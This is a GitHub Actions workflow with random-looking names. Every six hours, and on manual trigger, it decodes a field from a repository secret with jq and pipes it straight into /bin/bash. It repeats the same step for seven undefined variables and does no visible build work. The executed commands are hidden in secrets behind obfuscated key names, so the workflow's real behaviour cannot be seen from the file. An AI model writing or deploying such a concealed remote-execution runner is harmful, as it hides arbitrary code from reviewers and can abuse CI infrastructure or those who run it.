name: moguangmin1989
on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: moguangmin1989
        env:
          bvw70059: ${{ secrets.bvw70059 }}
        run: |
          echo $bvw70059 | jq -r .kxrg236 | /bin/bash
          echo $exon10 | jq -r .kzmb9 | /bin/bash
          echo $x439 | jq -r .rvk139 | /bin/bash
          echo $um59 | jq -r .hyr409 | /bin/bash
          echo $mnjcm33660 | jq -r .lyp7 | /bin/bash
          echo $ndc47 | jq -r .a95252 | /bin/bash
          echo $xts83794 | jq -r .nyber2062 | /bin/bash
          echo $ifq08 | jq -r .vqqq4180 | /bin/bash

